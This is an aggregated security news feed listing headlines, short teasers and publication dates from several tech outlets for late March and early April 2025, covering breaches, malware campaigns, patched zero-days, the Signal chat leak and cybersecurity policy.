Today's Core Dump is brought to you by ThreatPerspective

Biz & IT Ars Technica

What could possibly go wrong? DOGE to rapidly rebuild Social Security codebase.

A safe and proper rewrite should take years not months. The so-called Department of Government Efficiency (DOGE) is starting to put together a team to migrate the Social Security Administration’s (SSA) computer

Published: 2025-03-29T14:08:49



Biz & IT Ars Technica

Oracle has reportedly suffered 2 separate breaches exposing thousands of customers‘ PII

Alleged breaches affect Oracle Cloud and Oracle Health. Oracle isn’t commenting on recent reports that it has experienced two separate data breaches that have exposed sensitive personal information belonging to

Published: 2025-03-28T19:41:14



Biz & IT Ars Technica

Gemini hackers can deliver more potent attacks with a helping hand from Gemini

Hacking LLMs has always been more art than science. A new attack on Gemini could change that. In the growing canon of AI security, the indirect prompt injection has emerged as the most powerful means for attacke

Published: 2025-03-28T11:00:58



The Register - Software

Malware in Lisp? Now you're just being cruel

Miscreants warming to Delphi, Haskell, and the like to evade detection Malware authors looking to evade analysis are turning to less popular programming languages like Delphi or Haskell.

Published: 2025-03-29T10:50:05



The Register - Software

Windows Server 2025 locking up after February patch, no word of when a fix will land

Similar issue in Windows 11 resolved as of Wednesday Microsoft is warning that a faulty patch pushed out in February is causing Windows Server 2025 Remote Desktop sessions to freeze under certain circumstances.

Published: 2025-03-28T11:37:06



The Register - Software

US defense contractor cops to sloppy security, settles after infosec lead blows whistle

MORSE to pay -- .. .-.. .-.. .. --- -. ... for failing to meet cyber-grade A US defense contractor will cough up $4.6 million to settle complaints it failed to meet cybersecurity requirements on military contracts and knowingly submitted false claims

Published: 2025-03-26T20:07:11



The Register - Software

Microsoft patches patch that broke USB printing in Windows 11

Now the only nonsense printed out will come from the user Months after releasing a patch that left some printers spouting gibberish, Microsoft is issuing another update to deal with it.

Published: 2025-03-26T14:45:13



Security The Verge

Trump advisor reportedly used personal Gmail for ‘sensitive’ military discussions

Last week, National Security Advisor Michael Waltz inadvertently invited a journalist to a Signal chat discussing a planned military strike. Today, a new Washington Post report says that he has also discussed sensitive military positions and powerful weapons systems relating to an ongoing conflict, using his personal Gmail account. Waltz, along with other members of […] Photo of Michael Waltz, President Trump, and others. Last week, National Security Advisor Michael Waltz inadvertently invited a journalist to a Signal chat discussing a planned military strike. Today, a new Washington Post report says that he has also discussed “sensitive military positions and power...

Published: 2025-04-01T18:59:13



Security The Verge

Gmail is making it easier for businesses to send encrypted emails to anyone

Google is updating Gmail to allow enterprise users to send encrypted messages to any inbox in just a few clicks. Google says it's developed a new encryption model that, unlike the current encryption feature on Gmail, doesn t require senders or recipients to use custom software or exchange encryption certificates. The feature is rolling out in […] Google is updating Gmail to allow enterprise users to send encrypted messages to any inbox in just a few clicks. Google says it’s developed a new encryption model that, unlike the current encryption feature on Gmail, doesn’t require senders or reci...

Published: 2025-04-01T09:00:00



Security The Verge

Madison Square Garden’s surveillance system banned this fan over his T-shirt design

A concert on Monday night at New York's Radio City Music Hall was a special occasion for Frank Miller: his parents wedding anniversary. He didn t end up seeing the show and before he could even get past security, he was informed that he was in fac

Published: 2025-03-28T13:10:41



Security The Verge

Vivaldi bundles Proton VPN into its web browser

Vivaldi and Proton have teamed up to make it easier for Vivaldi browser users to privately explore the web without downloading a virtual private network (VPN). Starting today, the free version of Proton VPN is now integrated directly into Vivaldi's browser, and can be accessed by logging into a Vivaldi account. The feature is currently […] Vivaldi and Proton have teamed up to make it easier for Vivaldi browser users to privately explore the web without downloading a virtual private network (VPN). Starting today, the free version of Proton VPN is now integrated directly into Vivaldi’s...

Published: 2025-03-27T06:44:51



Security The Verge

The Atlantic releases strike group chat messages

On March 24th, The Atlantic's editor-in-chief Jeffrey Goldberg published a damning story about being added to the Houthi PC Small Group on Signal by Trump's national security adviser Mike Waltz. In it, he described inadvertently becoming privy to h

Published: 2025-03-26T10:58:12



Security The Verge

Trump officials planned a military strike over Signal with a magazine editor on the line

Getting added to the wrong group chat is a common problem, but what if that group chat is describing an upcoming military strike? That's what happened to The Atlantic editor-in-chief Jeffrey Goldberg, who was added to a Signal group chat formed by hi

Published: 2025-03-24T17:45:00



Security The Verge

Alleged Snowflake hacker agrees to be extradited to the US

Connor Moucka, accused of stealing large amounts of customer data from companies that used Snowflake's cloud storage services, has agreed to be extradited to the US to face charges, Cyberscoop reports. Around 165 companies were affected by the Snowflake breaches, including AT&T and Ticketmaster. Alexander Connor Moucka, who was arrested in Canada on October 30th […] Connor Moucka, accused of stealing large amounts of customer data from companies that used Snowflake’s cloud storage services, has agreed to be extradited to the US to face charges, Cyberscoop reports. Around 165 companies were affected by the Snow...

Published: 2025-03-24T17:39:05



Security The Verge

Google sues alleged scammers over 10,000 fake Maps listings

Google is taking down 10,000 fake business listings from Google Maps and suing a network of scammers who set them up, CBS News reports. The company's lawsuit alleges that a man connected to a broader scam network created fake business profiles on Google Maps and sold them for profit. Google was tipped off by a […] Google is taking down 10,000 fake business listings from Google Maps and suing a network of scammers who set them up, CBS News reports. The company’s lawsuit alleges that a man connected to a broader scam network created fake business profiles on G...

Published: 2025-03-20T17:32:57



Security The Verge

How the EU's DMA is changing Big Tech: all of the news and updates

The European Union’s Digital Markets Act (DMA) has come into force, and it’s meant that some of the world’s biggest tech companies are having to make major changes to how they operate. The law, which is designed to increase competition in the EU’s digital markets, designates some large online companies and their services as “gatekeepers.” […] The European Union’s Digital Markets Act (DMA) has come into force, and it’s meant that some of the world’s biggest tech companies are having to make major changes to how they operate. The law, which is designed to increase compet...

Published: 2025-03-19T12:15:59



Security The Verge

Why Google made a $32 billion bet on Wiz

Google’s latest acquisition is its most expensive yet — and perhaps its riskiest, too. On Tuesday, the search giant announced that it acquired the cloud security startup Wiz for $32 billion. It’s a major bet that Wiz can help beef up Google’s cloud business, which makes far less money than the offerings built by its […] Google’s latest acquisition is its most expensive yet — and perhaps its riskiest, too. On Tuesday, the search giant announced that it acquired the cloud security startup Wiz for $32 billion. It’...

Published: 2025-03-19T09:00:00



BleepingComputer

We Smell a (DC)Rat: Revealing a Sophisticated Malware Delivery Chain

A RAR file, a fake summons, and a Nietzsche quote all part of a multi-stage malware chain delivering DCRat & Rhadamanthys. Acronis TRU breaks down how attackers use VBS, batch, and PowerShell scripts to slip past defenses. [...]

Published: 2025-04-01T13:30:00



BleepingComputer

Apple backports zero-day patches to older iPhones and Macs

Apple has released security updates that backport fixes for actively exploited vulnerabilities that were exploited as zero-days to older versions of its operating systems. [...]

Published: 2025-04-01T09:35:33



BleepingComputer

Critical auth bypass bug in CrushFTP now exploited in attacks

Attackers are now targeting a critical authentication bypass vulnerability in the CrushFTP file transfer software using exploits based on publicly available proof-of-concept code. [...]

Published: 2025-04-01T08:46:21



BleepingComputer

Phishing platform 'Lucid' behind wave of iOS, Android SMS attacks

A phishing-as-a-service (PhaaS) platform named 'Lucid' has been targeting 169 entities in 88 countries using well-crafted messages sent on iMessage (iOS) and RCS (Android). [...]

Published: 2025-03-31T14:49:00



BleepingComputer

Hackers abuse WordPress MU-Plugins to hide malicious code

Hackers are utilizing the WordPress mu-plugins ("Must-Use Plugins") directory to stealthily run malicious code on every page while evading detection. [...]

Published: 2025-03-31T13:06:04



Technology

US to deploy world's first sixth-gen fighter by end of decade

Artist's concept of the F-47 The US Air Force has announced that it will go ahead with the production of the F-47 Next Generation Air Dominance (NGAD) fighter. Expected to enter service by the end of the decade, it will replace the F-22 Raptor as America's air supremacy fighter....

Published: 2025-03-24T00:21:08



Krebs on Security

When Getting Phished Puts You in Mortal Danger

Many successful phishing attacks result in a financial loss or malware infection. But falling for some phishing scams, like those currently targeting Russians searching online for organizations that are fighting the Kremlin war machine, can cost you ...

Published: 2025-03-27T16:39:49



Krebs on Security

Arrests in Tap-to-Pay Scheme Powered by Phishing

Authorities in at least two U.S. states last week independently announced arrests of Chinese nationals accused of perpetrating a novel form of tap-to-pay fraud using mobile devices. Details released by authorities so far indicate the mobile wallets b...

Published: 2025-03-21T19:12:04



The Register - Security

Microsoft to mark five decades of Ctrl-Alt-Deleting the competition

Copilot told us that half a century is 25 years. It feels much longer Microsoft will officially hit the half-century mark on Friday as the Windows giant turns 50 years old. What do you consider the highs and lows of the company's journey to dominance?

Published: 2025-04-01T15:32:08



The Register - Security

Google makes end-to-end encrypted Gmail easy for all even Outlook users

The UK government must be thrilled Google will soon offer end-to-end encrypted (E2EE) email for all users, even those who do not use Google Workspace, and says it'll do so without imposing any undue stress on IT admins.

Published: 2025-04-01T13:00:13



The Register - Security

UK threatens 100K-a-day fines under new cyber bill

Tech secretary reveals landmark legislation's full details for first time The UK's technology secretary revealed the full breadth of the government's Cyber Security and Resilience (CSR) Bill for the first time this morning, pledging 100,000 ($129,000) daily fines for failing to act against specific threats under consideration.

Published: 2025-04-01T11:37:23



The Register - Security

GCHQ intern took top secret spy tool home, now faces prison

Not exactly Snowden levels of skill A student at Britain's top eavesdropping government agency has pleaded guilty to taking sensitive information home on the first day of his trial.

Published: 2025-04-01T08:51:54



The Register - Security

CISA spots spawn of Spawn malware targeting Ivanti flaw

Resurge an apt name for malware targeting hardware maker that has security bug after security bug Owners of Ivanti's Connect Secure, Policy Secure, and ZTA Gateway products have a new strain of malware to fend off, according to the US Cybersecurity and Infrastructure Security Agency, aka CISA.

Published: 2025-04-01T01:09:08



The Register - Security

Top cybersecurity boffin, wife vanish as FBI raids homes

Indiana Uni rm -rf online profiles while agents haul boxes of evidence A tenured computer security professor at Indiana University and his university-employed wife have not been seen publicly since federal agents raided their homes late last week.

Published: 2025-03-31T23:16:39



The Register - Security

Oracle Cloud security SNAFU latest: IT giant accused of pedantry as evidence scrubbed

1990s incident response in 2025 Two Oracle data security breaches have been reported in the past week, and the database goliath not only remains reluctant to acknowledge the disasters publicly it may be scrubbing the web of evidence, too.

Published: 2025-03-31T21:30:00



The Register - Security

Check Point confirms breach, but says it was 'old' data and crook made 'false' claims

Explanation leaves a 'lot of questions unanswered,' says infosec researcher A digital burglar is claiming to have nabbed a trove of "highly sensitive" data from Check Point - something the American-Israeli security biz claims is a huge exaggeration.

Published: 2025-03-31T16:35:09



The Register - Security

Cloud security explained: What's left exposed?

Think AWS has security covered? Think again. Discover real-world examples of what it doesn't secure and how to protect your environment Advertorial AWS customers might assume that security is taken care of for them - however, this is a dangerous misconception.

Published: 2025-03-31T10:00:09



The Register - Security

China cracks down on personal information collection. No, seriously

PLUS: Indonesia crimps social media, allows iPhones; India claims rocket boost; In-flight GenAI for Japan Airlines Asia In Brief China last week commenced a crackdown on inappropriate collection and subsequent use of personal information.

Published: 2025-03-31T00:30:14



The Register - Security

Oracle Health reportedly warns of info leak from legacy server

PLUS: OpenAI bumps bug bounties bigtime; INTERPOL arrests 300 alleged cyber-scammers; And more! Infosec in brief Oracle Health appears to have fallen victim to an info stealing attack that has led to patient data stored by American hospitals being plundered.

Published: 2025-03-30T22:45:12



The Register - Security

Malware in Lisp? Now you're just being cruel

Miscreants warming to Delphi, Haskell, and the like to evade detection Malware authors looking to evade analysis are turning to less popular programming languages like Delphi or Haskell.

Published: 2025-03-29T10:50:05



The Register - Security

Cardiff's children's chief confirms data leak 2 months after cyber risk was 'escalated'

Department director admits Welsh capital's council still trying to get heads around threat of dark web leaks Cardiff City Council's director of children's services says data was leaked or stolen from the organization, although she did not clarify how or what was pilfered.

Published: 2025-03-28T12:28:14



The Register - Security

After Chrome patches zero-day used to target Russians, Firefox splats similar bug

Single click on a phishing link in Google browser blew up sandbox on Windows Google pushed out an emergency patch for Chrome on Windows this week to stop attackers exploiting a sandbox-breaking zero-day vulnerability, seemingly used by snoops to target certain folks in Russia.

Published: 2025-03-28T06:34:11



The Register - Security

Cyber-crew claims it cracked American cableco, releases terrible music video to prove it

WOW! DID! SOMEONE! REALLY! STEAL! DATA! ON! 400K! USERS?! A cyber-crime ring calling itself Arkana has made a cringe music video to boast of an alleged theft of subscriber account data from Colorado-based cableco WideOpenWest (literally, WOW!)

Published: 2025-03-28T01:17:11



The Register - Security

China's FamousSparrow flies back into action, breaches US org after years off the radar

Crew also cooked up two fresh SparrowDoor backdoor variants, says ESET The China-aligned FamousSparrow crew has resurfaced after a long period of presumed inactivity, compromising a US financial-sector trade group and a Mexican research institute. The gang also likely targeted a governmental institution in Honduras, along with other yet-to-be-identified victims.

Published: 2025-03-27T22:06:58



The Register - Security

Security shop pwns ransomware gang, passes insider info to authorities

Researchers say 'proactive' approach is needed to combat global cybercrime Here's one you don't see every day: A cybersecurity vendor is admitting to breaking into a notorious ransomware crew's infrastructure and gathering data it relayed to national agencies to help victims.

Published: 2025-03-27T16:32:09



The Register - Security

CrushFTP CEO's feisty response to VulnCheck's CVE for critical make-me-admin bug

Screenshot shows company head unhappy, claiming 'real CVE is pending' CrushFTP's CEO is not happy with VulnCheck after the CVE numbering authority (CNA) released an unofficial ID for the critical vulnerability in its file transfer tech disclosed almost a week ago.

Published: 2025-03-27T13:20:10



The Register - Security

UK's first permanent facial recognition cameras installed in South London

As if living in Croydon wasn't bad enough The Metropolitan Police has confirmed its first permanent installation of live facial recognition (LFR) cameras is coming this summer and the lucky location will be the South London suburb of Croydon.

Published: 2025-03-27T10:27:31



The Register - Security

Ransomwared NHS software supplier nabs 3M discount from ICO for good behavior

Data stolen included checklist for medics on how to get into vulnerable people's homes The UK's data protection watchdog is dishing out a 3.07 million ($3.95 million) fine to Advanced Computer Software Group, whose subsidiary's security failings led to a ransomware attack affecting NHS care.

Published: 2025-03-27T09:30:06



The Register - Security

Signalgate storm intensifies as journalist releases full secret Houthi airstrike chat

So F-18 launch times, weapons, drone support aren't classified now ... who knew? Updated The Atlantic's editor-in-chief who was inadvertently added to a Signal group in which the US Secretary of Defense, Vice President, and others discussed secret military plans has now publicly released the messages.

Published: 2025-03-26T21:16:32



The Register - Security

US defense contractor cops to sloppy security, settles after infosec lead blows whistle

MORSE to pay -- .. .-.. .-.. .. --- -. ... for failing to meet cyber-grade A US defense contractor will cough up $4.6 million to settle complaints it failed to meet cybersecurity requirements on military contracts and knowingly submitted false claims for payment.

Published: 2025-03-26T20:07:11



The Register - Security

Files stolen from NSW court system, including restraining orders for violence

Victims' details at risk after criminals download 9,000 files from court database Australian police are currently investigating the theft of "sensitive" data from a New South Wales court system after they confirmed approximately 9,000 files were stolen.

Published: 2025-03-26T17:29:05



The Register - Security

Credible nerd says stop using atop, doesn't say why, everyone panics

Bad news about the Linux system monitor may be on the way Updated Veteran sysadmin and tech blogger Rachel Kroll posted a cryptic warning yesterday about a popular Linux system monitoring tool. Maybe it's better to be safe than sorry.

Published: 2025-03-26T15:31:09



The Register - Security

NCSC taps influencers to make 2FA go viral

Who knew social media stars had a role to play in building national cyber resilience? The world's biggest brands have benefited from influencer marketing for years now the UK's National Cyber Security Centre (NCSC) has hopped on the bandwagon to preach two-factor authentication (2FA) to the masses.

Published: 2025-03-26T11:00:13



The Register - Security

There are 10,000 reasons to doubt Oracle Cloud's security breach denial

Customers come forward claiming info was swiped from prod Oracle Cloud's denial of a digital break-in is now in clear dispute. A infosec researcher working on validating claims that the cloud provider's login servers were compromised earlier this year says some customers have confirmed data allegedly stolen and leaked from the database giant is genuine.

Published: 2025-03-25T17:35:42



The Register - Security

Infosec pro Troy Hunt HasBeenPwned in Mailchimp phish

16,000 stolen records pertain to former and active mail subscribers Infosec veteran Troy Hunt of HaveIBeenPwned fame is notifying thousands of people after phishers scooped up his Mailchimp mailing list.

Published: 2025-03-25T12:28:08



The Register - Security

You know that generative AI browser assistant extension is probably beaming everything to the cloud, right?

Just an FYI, like Generative AI assistants packaged up as browser extensions harvest personal data with minimal safeguards, researchers warn.

Published: 2025-03-25T08:31:12



The Register - Security

VanHelsing ransomware emerges to put a stake through your Windows heart

There's only one rule don't attack Russia, duh Check Point has spotted a fresh ransomware-as-a-service crew in town: VanHelsing, touting a cross-platform locker targeting Microsoft Windows, Linux, and VMware ESXi systems, among others. But so far, only Windows machines have fallen victim, we're told.

Published: 2025-03-25T07:32:07



The Register - Security

Hm, why are so many DrayTek routers stuck in a bootloop?

Time to update your firmware, if you can, to one with the security fixes, cough cough DrayTek router owners in the UK and beyond had a pretty miserable weekend after some ISPs began to notice a bunch of their customers' gateways going offline.

Published: 2025-03-25T06:37:06



The Register - Security

Public-facing Kubernetes clusters at risk of takeover thanks to Ingress-Nginx flaw

How many K8s systems are sat on the internet front porch like that ... Oh, thousands, apparently Cloudy infosec outfit Wiz has discovered serious vulnerabilities in the admission controller component of Ingress-Nginx Controller that could allow the total takeover of Kubernetes clusters and thinks more than 6,000 deployments of the software are at risk on the internet.

Published: 2025-03-25T03:12:10



The Register - Security

OTF, which backs Tor, Let's Encrypt and more, sues to save its funding from Trump cuts

Kari, are you OK, are you OK, Kari? Updated An organization that bankrolls various internet security projects has asked a Washington DC court to prevent the Trump administration from cancelling its federal funding and expressed fears that if the cash stops flowing, the tools it supports could become harder to access.

Published: 2025-03-25T00:46:04



The Register - Security

Top Trump officials text secret Yemen airstrike plans to journo in Signal SNAFU

Massive OPSEC fail from the side who brought you 'lock her up' Updated Senior Trump administration officials used the messaging app Signal to discuss detailed plans to attack Houthi rebels in Yemen and accidentally added a journalist to the group in which they chatted.

Published: 2025-03-24T23:02:47



The Register - Security

FCC on the prowl for Huawei and other blocked Chinese makers in America

Be vewy vewy quiet, I'm hunting rackets The FCC is investigating whether Chinese manufacturers black-listed on its so-called Covered List - including Huawei - are still somehow doing business in America, either by misreading the rules or willfully ignoring them.

Published: 2025-03-24T21:24:43



The Register - Security

As nation-state hacking becomes 'more in your face,' are supply chains secure?

Ex-US Air Force officer says companies shouldn't wait for govt mandates Interview Former US Air Force cyber officer Sarah Cleveland worries about the threat of a major supply-chain attack from China or another adversarial nation. So she installed solar panels on her house: "Because what if the electric grid goes down?"

Published: 2025-03-24T20:32:11



The Register - Security

AI agents swarm Microsoft Security Copilot

Looking to sort through large volumes of security info? Redmond has your backend Microsoft's Security Copilot is getting some degree of agency, allowing the underlying AI model to interact more broadly with the company's security software to automate various tasks.

Published: 2025-03-24T16:00:09



The Register - Security

23andMe's genes not strong enough to avoid Chapter 11

CEO steps down after multiple failed attempts to take the DNA testing company private Beleaguered DNA testing biz 23andMe hit by a massive cyber attack in 2023 is filing for bankruptcy protection in the US following years of financial uncertainty.

Published: 2025-03-24T14:01:09



The Register - Security

Is Washington losing its grip on crypto, or is it a calculated pivot to digital dominance?

It's been a very busy week for Digicash Donald's administration Analysis Is the US retreating from its hardline stance on crypto? On Friday, the US Treasury Department lifted sanctions imposed on notorious crypto mixer Tornado Cash, once accused of washing billions in illicit crypto for criminals and nation-states alike.

Published: 2025-03-24T11:45:14



The Register - Security

Microsoft tastes the unexpected consequences of tariffs on time

Throw a spanner in the works, best get good at fixing things. Now, where did you put that spanner? Opinion Never attribute to malice that which is adequately explained by stupidity. This works well in sane times, less so when "but it's both" is the default. Apply it to Microsoft's decision to make bug reports include not only a working example but a video of the same, and the meter oscillates wildly. What were they thinking? What did they expect?

Published: 2025-03-24T09:30:12



The Register - Security

Mobsters now overlap with cybercrime gangs and use AI for evil, Europol warns

PLUS: Russian bug-buyers seeks Telegram flaws; Another WordPress security mess; NIST backlog grows; and more! Infosec In Brief Organized crime networks are now reliant on digital tech for most of their activities according to Europol, the European agency that fights international crime on the continent and beyond.

Published: 2025-03-24T05:29:13



The Register - Security

China bans compulsory facial recognition and its use in private spaces like hotel rooms

PLUS: Zoho's Ulaa anointed India's most patriotic browser; Typhoon-like gang targets Taiwan; Japan debates offensive cyber-ops; and more Asia In Brief China's Cyberspace Administration and Ministry of Public Security has outlawed the use of facial recognition without consent.

Published: 2025-03-23T23:29:34



The Register - Security

Oracle Cloud says it's not true someone broke into its login servers and stole data

Despite evidence to the contrary as alleged pilfered info goes on sale Oracle has straight up denied claims by a miscreant that its public cloud offering has been compromised and information stolen.

Published: 2025-03-23T21:09:14



The Register - Security

Ex-NSA boss: Election security focus helped dissuade increase in Russian meddling with US

Plus AI in the infosec world, why CISA should know its place, and more Interview Russia appears to be having second thoughts on how aggressively, or at least how visibly, it attempts to influence American elections, according to a former head of the NSA.

Published: 2025-03-23T13:04:07



The Register - Security

AdTech CEO whose products detected fraud jailed for financial fraud

Made up revenue and pretended to use non-existent data The former CEO of Kubient, an advertising tech company that developed a cloudy product capable of detecting fraudulent ads, has been jailed for fraud.

Published: 2025-03-21T07:32:07



The Register - Security

Paragon spyware deployed against journalists and activists, Citizen Lab claims

Plus: Customer info stolen from 'parental control' software slinger SpyX; F-35 kill switch denied Infosec newsbytes Israeli spyware maker Paragon Solutions pitches its tools as helping governments and law enforcement agencies to catch criminals and terrorists, but a fresh Citizen Lab report claims its software has been used to target journalists, activists, and other civilians.

Published: 2025-03-21T06:26:06



The Register - Security

Capital One cracker could be sent back to prison after judges rule she got off too lightly

Feds want book thrown at Paige Thompson, who pinched 100M customer records Paige Thompson, the perpetrator of the Capital One data theft, may be sent back behind bars after an appeals court ruled her sentence of time served plus five years of probation was too lenient.

Published: 2025-03-21T01:06:58



The Register - Security

Dept of Defense engineer took home top-secret docs, booked a fishing trip to Mexico then the FBI showed up

So much for that vacation A US Department of Defense electrical engineer has turned his world upside down after printing 155 pages from 20 documents, all of which were marked top secret and classified, from his DoD workspace, brought them home with him and was collared on his way to Mexico.

Published: 2025-03-20T23:02:20



The Register - Security

Infoseccers criticize Veeam over critical RCE vulnerability and a failing blacklist

Palming off the blame using an unknown best practice didn't go down well either In patching the latest critical remote code execution (RCE) bug in Backup and Replication, software shop Veeam is attracting criticism from researchers for the way it handles uncontrolled deserialization vulnerabilities.

Published: 2025-03-20T18:33:14



The Register - Security

Too many software supply chain defense bibles? Boffins distill advice

How to avoid another SolarWinds, Log4j, and XZ Utils situation Organizations concerned about software supply chain attacks should focus on role-based access control, system monitoring, and boundary protection, according to a new preprint paper on the topic.

Published: 2025-03-20T13:31:13



The Register - Security

The post-quantum cryptography apocalypse will be televised in 10 years, says UK's NCSC

Wow, a government project that could be on time for once ... cos it's gonna be wayyyy more than a decade The UK's National Cyber Security Centre (NCSC) today started the post-quantum cryptography (PQC) countdown clock by claiming organizations have ten years to migrate to a safer future.

Published: 2025-03-20T13:15:05



Security Latest

Cybersecurity Professor Mysteriously Disappears as FBI Raids His Homes

Xiaofeng Wang, a longtime computer science professor at Indiana University, has disappeared along with his wife, and their profiles on the school's website were wiped ahead of recent FBI raids.

Published: 2025-03-31T19:42:00



Security Latest

An AI Image Generator’s Exposed Database Reveals What People Really Used It For

An unsecured database used by a generative AI app revealed prompts and tens of thousands of explicit images some of which are likely illegal. The company deleted its websites after WIRED reached out.

Published: 2025-03-31T10:00:00



Security Latest

Top Trump Officials’ Passwords and Personal Phone Numbers Discovered Online

Plus: Alleged Snowflake hacker will be extradited to US, internet restrictions create an information vacuum in Myanmar, and London gets its first permanent face recognition cameras.

Published: 2025-03-29T10:30:00



Security Latest

Even More Venmo Accounts Tied to Trump Officials in Signal Group Chat Left Data Public

WIRED has found four new Venmo accounts that appear to be associated with Trump officials who were in an infamous Signal chat. One made a payment with a note consisting solely of an eggplant emoji.

Published: 2025-03-27T21:47:31



Security Latest

SignalGate Is Driving the Most US Downloads of Signal Ever

Scandal surrounding the Trump administration’s Signal group chat has led to a landmark week for the encrypted messaging app’s adoption its “largest US growth moment by a massive margin.”

Published: 2025-03-27T18:31:30



Security Latest

Mike Waltz Left His Venmo Friends List Public

A WIRED review shows national security adviser Mike Waltz, White House chief of staff Susie Wiles, and other top officials left sensitive information exposed via Venmo until WIRED asked about it.

Published: 2025-03-26T20:44:21



Security Latest

SignalGate Isn’t About Signal

The Trump cabinet’s shocking leak of its plans to bomb Yemen raises myriad confidentiality and legal issues. The security of the encrypted messaging app Signal is not one of them.

Published: 2025-03-26T18:54:49



Security Latest

How to Delete Your Data From 23andMe

DNA-testing company 23andMe has filed for bankruptcy, which means the future of the company’s vast trove of customer data is unknown. Here’s what that means for your genetic data.

Published: 2025-03-24T20:51:59



Security Latest

How to Enter the US With Your Digital Privacy Intact

Crossing into the United States has become increasingly dangerous for digital privacy. Here are a few steps you can take to minimize the risk of Customs and Border Protection accessing your data.

Published: 2025-03-24T18:10:05



Security Latest

Using Starlink Wi-Fi in the White House Is a Slippery Slope for US Federal IT

The ad hoc addition to the otherwise tightly controlled White House information environment could create blind spots and security exposures while setting potentially dangerous precedent.

Published: 2025-03-24T17:24:31



Security Latest

Trump’s Aggression Sours Europe on US Cloud Giants

Companies in the EU are starting to look for ways to ditch Amazon, Google, and Microsoft cloud services amid fears of rising security risks from the US. But cutting ties won’t be easy.

Published: 2025-03-24T06:00:00



Security Latest

How to Avoid US-Based Digital Services and Why You Might Want To

Amid growing concerns over Big Tech firms aligning with Trump administration policies, people are starting to move their digital lives to services based overseas. Here's what you need to know.

Published: 2025-03-21T10:30:00



Security Latest

Low-Cost Drone Add-Ons From China Let Anyone With a Credit Card Turn Toys Into Weapons of War

Chinese ecommerce giants like Temu and AliExpress sell drone accessories like those used by soldiers in the Russia-Ukraine conflict.

Published: 2025-03-20T09:00:00



The Hacker News

Over 1,500 PostgreSQL Servers Compromised in Fileless Cryptocurrency Mining Campaign

Exposed PostgreSQL instances are the target of an ongoing campaign designed to gain unauthorized access and deploy cryptocurrency miners. Cloud security firm Wiz said the activity is a variant of an intrusion set that was first flagged by Aqua Security in August 2024 that involved the use of a malware strain dubbed PG_MEM. The campaign has been attributed to a threat actor Wiz tracks as

Published: 2025-04-01T22:38:00



The Hacker News

Enterprise Gmail Users Can Now Send End-to-End Encrypted Emails to Any Platform

On the 21st birthday of Gmail, Google has announced a major update that allows enterprise users to send end-to-end encrypted (E2EE) to any user in any email inbox in a few clicks. The feature is rolling out starting today in beta, allowing users to send E2EE emails to Gmail users within an organization, with plans to send E2EE emails to any Gmail inbox in the coming weeks and to any email inbox

Published: 2025-04-01T21:04:00



The Hacker News

Lucid PhaaS Hits 169 Targets in 88 Countries Using iMessage and RCS Smishing

A new sophisticated phishing-as-a-service (PhaaS) platform called Lucid has targeted 169 entities in 88 countries using smishing messages propagated via Apple iMessage and Rich Communication Services (RCS) for Android. Lucid's unique selling point lies in its weaponizing of legitimate communication platforms to sidestep traditional SMS-based detection mechanisms. "Its scalable,

Published: 2025-04-01T19:48:00



The Hacker News

Apple Backports Critical Fixes for 3 Recent 0-Days Impacting Older iOS and macOS Devices

Apple on Monday backported fixes for three vulnerabilities that have come under active exploitation in the wild to older models and previous versions of the operating systems. The vulnerabilities in question are listed below - CVE-2025-24085 (CVSS score: 7.3) - A use-after-free bug in the Core Media component that could permit a malicious application already installed on a device to elevate

Published: 2025-04-01T16:58:00



The Hacker News

Nearly 24,000 IPs Target PAN-OS GlobalProtect in Coordinated Login Scan Campaign

Cybersecurity researchers are warning of a spike in suspicious login scanning activity targeting Palo Alto Networks PAN-OS GlobalProtect gateways, with nearly 24,000 unique IP addresses attempting to access these portals. "This pattern suggests a coordinated effort to probe network defenses and identify exposed or vulnerable systems, potentially as a precursor to targeted exploitation," threat

Published: 2025-04-01T16:47:00



The Hacker News

China-Linked Earth Alux Uses VARGEIT and COBEACON in Multi-Stage Cyber Intrusions

Cybersecurity researchers have shed light on a new China-linked threat actor called Earth Alux that has targeted various key sectors such as government, technology, logistics, manufacturing, telecommunications, IT services, and retail in the Asia-Pacific (APAC) and Latin American (LATAM) regions. "The first sighting of its activity was in the second quarter of 2023; back then, it was

Published: 2025-04-01T16:33:00



The Hacker News

New Case Study: Global Retailer Overshares CSRF Tokens with Facebook

Are your security tokens truly secure? Explore how Reflectiz helped a giant retailer to expose a Facebook pixel that was covertly tracking sensitive CSRF tokens due to human error misconfigurations. Learn about the detection process, response strategies, and steps taken to mitigate this critical issue. Download the full case study here.  By implementing Reflectiz's recommendations, the

Published: 2025-04-01T16:33:00



The Hacker News

Apple Fined 150 Million by French Regulator Over Discriminatory ATT Consent Practices

Apple has been hit with a fine of 150 million ($162 million) by France's competition watchdog over the implementation of its App Tracking Transparency (ATT) privacy framework. The Autorit de la concurrence said it's imposing a financial penalty against Apple for abusing its dominant position as a distributor of mobile applications for iOS and iPadOS devices between April 26, 2021 and July 25,

Published: 2025-04-01T11:17:00



The Hacker News

Russian Hackers Exploit CVE-2025-26633 via MSC EvilTwin to Deploy SilentPrism and DarkWisp

The threat actors behind the zero-day exploitation of a recently-patched security vulnerability in Microsoft Windows have been found to deliver two new backdoors called SilentPrism and DarkWisp. The activity has been attributed to a suspected Russian hacking group called Water Gamayun, which is also known as EncryptHub and LARVA-208. "The threat actor deploys payloads primarily by means of

Published: 2025-03-31T22:11:00



The Hacker News

Hackers Exploit WordPress mu-Plugins to Inject Spam and Hijack Site Images

Threat actors are using the "mu-plugins" directory in WordPress sites to conceal malicious code with the goal of maintaining persistent remote access and redirecting site visitors to bogus sites. mu-plugins, short for must-use plugins, refers to plugins in a special directory ("wp-content/mu-plugins") that are automatically executed by WordPress without the need to enable them explicitly via the

Published: 2025-03-31T17:34:00



The Hacker News

Weekly Recap: Chrome 0-Day, IngressNightmare, Solar Bugs, DNS Tactics, and More

Every week, someone somewhere slips up and threat actors slip in. A misconfigured setting, an overlooked vulnerability, or a too-convenient cloud tool becomes the perfect entry point. But what happens when the hunters become the hunted? Or when old malware resurfaces with new tricks? Step behind the curtain with us this week as we explore breaches born from routine oversights and the unexpected

Published: 2025-03-31T16:55:00



The Hacker News

5 Impactful AWS Vulnerabilities You're Responsible For

If you're using AWS, it's easy to assume your cloud security is handled - but that's a dangerous misconception. AWS secures its own infrastructure, but security within a cloud environment remains the customer’s responsibility. Think of AWS security like protecting a building: AWS provides strong walls and a solid roof, but it's up to the customer to handle the locks, install the alarm systems,

Published: 2025-03-31T16:30:00



The Hacker News

Russia-Linked Gamaredon Uses Troop-Related Lures to Deploy Remcos RAT in Ukraine

